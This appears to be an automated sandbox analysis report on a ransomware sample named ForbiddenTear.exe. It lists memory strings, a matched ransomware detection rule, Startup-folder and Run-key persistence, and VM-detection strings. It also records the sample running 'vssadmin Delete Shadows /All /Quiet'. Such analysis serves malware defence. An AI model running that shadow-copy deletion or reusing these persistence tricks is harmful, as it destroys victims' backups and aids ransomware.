    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameqrcodepmp.dll< vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSFHelper.dll vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIWActs.dllX vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePerfInst.dll\ vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259066936.000000000A73A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdobeHunspellPlugin.dll, vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdobeLinguistic.dll, vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSpelling.apiD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.255600472.0000000008510000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.255988303.000000000A094000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdobeARM.exeb! vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000000.207910299.00000000003A5000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDecrypt.exe$ vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamearmsvc.exeZ vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAccessibility.apiD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMakeAccessible.api^ vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePDDom.apiD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameReflow.apiD vs ForbiddenTear.exe
    Source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSaveAsRTF.apiD vs ForbiddenTear.exe
    Source: unknownDriver loaded: C:\Windows\System32\cdd.dll
    Source: ForbiddenTear.exe, type: SAMPLEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc, type: DROPPEDMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
    Source: 0.2.ForbiddenTear.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
    Source: 0.0.ForbiddenTear.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_COVID19_Apr20_1 date = 2020-04-15, hash1 = 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326, author = Florian Roth, description = Detects ransomware distributed in COVID-19 theme, reference = https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/
    Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpBinary or memory string: .sh.sln
    Source: classification engineClassification label: mal100.rans.adwa.winEXE@12/5@1/1
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01
    Source: ForbiddenTear.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\ForbiddenTear.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Users\user\Desktop\ForbiddenTear.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: ForbiddenTear.exeVirustotal: Detection: 54%
    Source: ForbiddenTear.exeReversingLabs: Detection: 50%
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile read: C:\Users\user\Desktop\ForbiddenTear.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\ForbiddenTear.exe 'C:\Users\user\Desktop\ForbiddenTear.exe'
    Source: unknownProcess created: C:\Windows\System32\cmd.exe 'cmd' /C vssadmin Delete Shadows /All /Quiet
    Source: unknownProcess created: C:\Windows\System32\sihost.exe sihost.exe
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\sihost.exe sihost.exe
    Source: unknownProcess created: C:\Windows\System32\sihost.exe sihost.exe
    Source: unknownProcess created: C:\Windows\System32\sihost.exe sihost.exe
    Source: unknownProcess created: C:\Windows\System32\sihost.exe sihost.exe
    Source: unknownProcess created: C:\Windows\System32\sihost.exe sihost.exe
    Source: unknownProcess created: C:\Windows\System32\ctfmon.exe ctfmon.exe
    Source: unknownProcess created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0 /state0:0xa3fd2855 /state1:0x41c64e6d
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /C vssadmin Delete Shadows /All /Quiet
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: ForbiddenTear.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: ForbiddenTear.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: qrcodepmp.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: MCIMPP.pdb"" source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: 3difr.pdb== source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: qrcodepmp.pdb$$ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: Accessibility.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: SaveAsRTF.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: drvSOFT.pdb66 source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: WindowsMedia.pdb++ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: WindowsMedia.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: tesselate.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: 2d.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: drvSOFT.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: PerfInst.pdb1 source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb A source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: Multimedia.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: prcr.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: Flash.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARM.pdb source: ForbiddenTear.exe, 00000000.00000002.255988303.000000000A094000.00000004.00000001.sdmp
    Source: Binary string: Annots.pdb source: ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp
    Source: Binary string: 3difr.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: datamatrixpmp.pdb((4 source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: .db.dbf.mdb.pdb.sql.dwg.dxf.sxc.ots source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp
    Source: Binary string: Spelling.pdbSS( source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: Spelling.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: MakeAccessible.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: Multimedia.pdb& source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: AdobeLinguistic.pdbQQ source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: Reflow.pdbRR source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: PDDom.pdbiiH source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: SaveAsRTF.pdbUU source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: Accessibility.pdbpp source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: D:\garuda_1890\esg\lilo\plugins\AdobeHunspellPlugin\6.1\binaries\VC.Net2010\Win32\Release\AdobeHunspellPlugin.pdb source: ForbiddenTear.exe, 00000000.00000002.259066936.000000000A73A000.00000004.00000001.sdmp
    Source: Binary string: Flash.pdb++ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: MCIMPP.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: ForbiddenTear.exe, 00000000.00000002.255929783.000000000A031000.00000004.00000001.sdmp
    Source: Binary string: QuickTime.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: datamatrixpmp.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: pdf417pmp.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: rt3d.pdb source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: .db.dbf.mdb.pdb.sql.dwg.dxf.asp source: ForbiddenTear.exe, 00000000.00000000.207910299.00000000003A5000.00000002.00020000.sdmp
    Source: Binary string: D:\B\127930\Acrobat\Installers\Install_MaintenanceWizard\CustomActions\IWActs\Release\IWActs.pdb source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp
    Source: Binary string: Reflow.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: pdf417pmp.pdb$$ source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp
    Source: Binary string: PDDom.pdb source: ForbiddenTear.exe, 00000000.00000002.256113264.000000000A18C000.00000004.00000001.sdmp
    Source: Binary string: AdobeLinguistic.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: drvDX9.pdb source: ForbiddenTear.exe, 00000000.00000002.259435306.000000000AADF000.00000004.00000001.sdmp
    Source: Binary string: PerfInst.pdb source: ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_04C322DB push ds; ret
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_04C322E7 push ds; ret
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_04C32244 push ds; ret
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_04C3225F push ds; ret
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_04C3220F push ds; ret
    Source: C:\Users\user\Desktop\ForbiddenTear.exeCode function: 0_2_04C3222C push 0000001Ch; ret
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJump to dropped file
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the startup folderShow sources
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJump to dropped file
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJump to behavior
    Source: C:\Users\user\Desktop\ForbiddenTear.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmcJump to behavior
    Source: C:\Users\user\Desktop\ForbiddenTear.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ServiceJump to behavior
    Source: C:\Users\user\Desktop\ForbiddenTear.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ServiceJump to behavior

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (5001).png
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information set: NOOPENFILEERRORBOX
    Source: ForbiddenTear.exeBinary or memory string: vmware-converter-a
    Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: .?AVMCIMPPPlayer@@
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: .?AVMCIMPPWorld@@
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: .?AVMCIException@@
    Source: ForbiddenTear.exeBinary or memory string: vmtoolsd
    Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpBinary or memory string: .?AVMCIMPPAuthor@@
    Source: ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpBinary or memory string: WmiPrvSE%vmware-converter-a
    Source: ForbiddenTear.exe, 00000000.00000002.245907968.0000000000A53000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: ForbiddenTear.exe, 00000000.00000002.255651770.0000000008580000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Windows\System32\cdd.dllSystem information queried: ModuleInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\ForbiddenTear.exeMemory allocated: page read and write | page guard
    Source: C:\Users\user\Desktop\ForbiddenTear.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /C vssadmin Delete Shadows /All /Quiet
    Source: ForbiddenTear.exe, 00000000.00000002.246194238.00000000011C0000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: ForbiddenTear.exe, 00000000.00000002.246194238.00000000011C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: ForbiddenTear.exe, 00000000.00000002.255988303.000000000A094000.00000004.00000001.sdmpBinary or memory string: gHExitMaximize&Click to activateShell_TrayWndTrayNotifyWndp
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Users\user\Desktop\ForbiddenTear.exe VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
